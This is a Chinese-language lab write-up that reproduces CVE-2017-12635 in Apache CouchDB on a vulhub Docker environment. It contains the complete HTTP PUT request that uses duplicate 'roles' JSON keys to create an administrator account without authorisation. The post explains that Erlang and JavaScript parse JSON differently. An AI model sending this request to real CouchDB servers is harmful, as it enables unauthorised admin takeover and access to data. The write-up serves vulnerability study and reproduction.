Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现

Apache CouchDB 垂直权限绕过漏洞 CVE-2017-12635 已亲自复现

漏洞名称

漏洞描述

Apache CouchDB是一个开源的NoSQL数据库,专注于易用性和成为"完全拥抱web的数据库"。它是一个使用JSON作为数据存储格式,javascript作为查询语言,MapReduce和HTTP作为API的NoSQL数据库。

在2017年11月15日,CVE-2017-12635和CVE-2017-12636披露,CVE-2017-12635是由于Erlang和JavaScript对JSON解析方式的不同,导致语句执行产生差异性导致的。这个漏洞可以让任意用户创建管理员,属于垂直权限绕过漏洞。

影响版本

Apache CouchDB 1.7.0 / 2.x < 2.1.1

漏洞复现

环境搭建

vulhub链接

bash 复制代码
https://vulhub.org//#/environments/couchdb/CVE-2017-12635/

启动vulhub

bash 复制代码
docker-compose up -d 

环境启动后,访问http://192.168.63.129:5984/_utils/即可看到一个web页面,说明Couchdb已成功启动。

漏洞利用

bash 复制代码
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 90

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

返回403错误,提示 {"error":"forbidden","reason":"Only _admin may set roles"},只有管理员才能设置Role角色

这个时候,我们利用 Erlang和JavaScript 处理 JSON 的特性,发送包含两个roles的数据包,即可绕过限制:

bash 复制代码
PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: your-ip:5984
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 108

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

验证是否成功

且在创建一个成功后,再重复发包,也会报错409,修改已创建的密码也不行

总结

在JavaScript在解析时会把"roles": ["_admin"],"roles": [],解析为"roles": []用来检测创建角色的权限,其值为空,使用PUT方法上传时服务器时检测权限为空,即可绕过安全限制,并通过使用Erlang部分实现身份验证和授权,通过getter函数返回第一个值为:"roles": ["_admin"],并创建具有管理员的用户wahaha:wahaha。如果攻击成功,在响应头中的状态码为201,且在响应体中返回org.couchdb.user字样,或在响应头中返回409状态码,在响应体中返回Document update conflict字样。

相关推荐
一名优秀的码农11 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp11 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp11 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人11 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp11 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
james的分享11 天前
大数据领域核心 SQL 优化框架Apache Calcite介绍
大数据·sql·apache·calcite
莫寒清11 天前
Apache Tika
java·人工智能·spring·apache·知识图谱
Mikowoo00711 天前
渗透测试_漏洞利用
网络安全
归叶再无青11 天前
web服务安装部署、性能升级等(Apache、Nginx)
运维·前端·nginx·云原生·apache·bash
啥都想学点11 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全